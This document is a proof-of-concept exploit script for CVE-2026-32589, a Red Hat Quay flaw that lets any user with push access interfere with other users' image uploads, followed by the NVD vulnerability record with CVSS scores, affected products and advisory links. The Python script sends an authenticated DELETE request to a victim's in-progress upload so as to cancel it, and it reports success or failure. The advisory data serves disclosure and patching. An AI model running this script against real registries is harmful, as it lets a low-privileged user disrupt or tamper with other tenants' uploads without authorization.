CVE-2026-32589

import requests # Target configuration target_url = "https://quay.example.com" victim_repo = "target_namespace/private_repo" victim_upload_uuid = "a1b2c3d4-1234-5678-90ab-cdef12345678" # UUID of the in-progress upload # Attacker's credentials (User with push access to ANY repo) attacker_token = "Bearer <valid_auth_token>" headers = { "Authorization": attacker_token, "Content-Type": "application/json" } # Exploit: Attempt to delete the victim's upload (Denial of Service) # Endpoint structure based on typical Quay API patterns delete_url = f"{target_url}/api/v1/repository/{victim_repo}/uploads/{victim_upload_uuid}" print(f"[*] Attempting to interrupt upload {victim_upload_uuid}...") try: response = requests.delete(delete_url, headers=headers) if response.status_code == 204: print("[+] Exploit successful: Upload cancelled.") elif response.status_code == 403: print("[-] Exploit failed: Permission denied (System may be patched).") else: print(f"[-] Unexpected response: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2026-32589", "sourceIdentifier": "[email protected]", "published": "2026-04-08T18:25:59.790", "lastModified": "2026-05-20T04:16:49.523", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 3.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:-:*:*:*:*:*:*:*", "matchCriteriaId": "63757310-FC5B-44E6-9211-36269827BC56"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "281E6AA4-1E08-488F-BA7A-F0BE7CF42A5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:quay:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1987BDA-0113-4603-B9BE-76647EB043F2"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:19375", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-32589", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446963", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}